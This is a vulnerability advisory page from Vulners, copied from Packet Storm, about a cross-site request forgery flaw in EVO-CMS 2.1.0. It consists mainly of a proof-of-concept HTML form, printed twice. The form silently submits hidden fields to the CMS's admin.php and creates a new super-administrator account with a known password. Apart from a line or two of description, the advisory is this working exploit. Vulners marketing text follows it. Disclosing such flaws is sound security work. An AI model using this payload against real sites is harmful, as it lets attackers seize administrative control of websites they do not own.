Lucene search
K

EVO-CMS 2.1.0 Cross Site Request Forgery

🗓️ 24 Feb 2015 00:00:00Reported by ProvensecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

EVO-CMS 2.1.0 Cross Site Request Forgery vulnerability allows adding new admin via CSRF attac

Code
`# Affected software: evo cms  
# Type of vulnerability: adding new admin (csrf)  
# URL: http://www.evo-german.com/  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
#version:EVO-CMS 2.1.0  
# Proof of concept  
  
attacker was able to add new admin as there were no protection against csrf  
  
  
poc  
  
<html>  
  
<body>  
<form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">  
<input type="hidden" name="authors[add_name]" value="test" />  
<input type="hidden" name="authors[add_aid]"  
value="test123" />  
<input type="hidden" name="authors[add_email]"  
value="[email protected]" />  
<input type="hidden" name="authors[add_url]"  
value="http://demo.opensourcecms.com/evocms/" />  
<input type="hidden" name="authors[add_admlanguage]"  
value="english" />  
<input type="hidden" name="authors[add_radminsuper]"  
value="1" />  
<input type="hidden" name="authors[add_pwd]"  
value="test123" />  
<input type="hidden" name="authors[add_pwd2]"  
value="test123" />  
<input type="hidden" name="op" value="addadmin" />  
<input type="hidden" name="module" value="authors" />  
<input type="hidden" name="submit" value="Create Administrator" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
  
  
  
  
  
  
  
  
  
poc:  
  
<html>  
  
<body>  
<form action="http://demo.opensourcecms.com/evocms/admin.php" method="POST">  
<input type="hidden" name="authors[add_name]" value="test" />  
<input type="hidden" name="authors[add_aid]"  
value="test123" />  
<input type="hidden" name="authors[add_email]"  
value="[email protected]" />  
<input type="hidden" name="authors[add_url]"  
value="http://demo.opensourcecms.com/evocms/" />  
<input type="hidden" name="authors[add_admlanguage]"  
value="english" />  
<input type="hidden" name="authors[add_radminsuper]"  
value="1" />  
<input type="hidden" name="authors[add_pwd]"  
value="test123" />  
<input type="hidden" name="authors[add_pwd2]"  
value="test123" />  
<input type="hidden" name="op" value="addadmin" />  
<input type="hidden" name="module" value="authors" />  
<input type="hidden" name="submit" value="Create Administrator" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation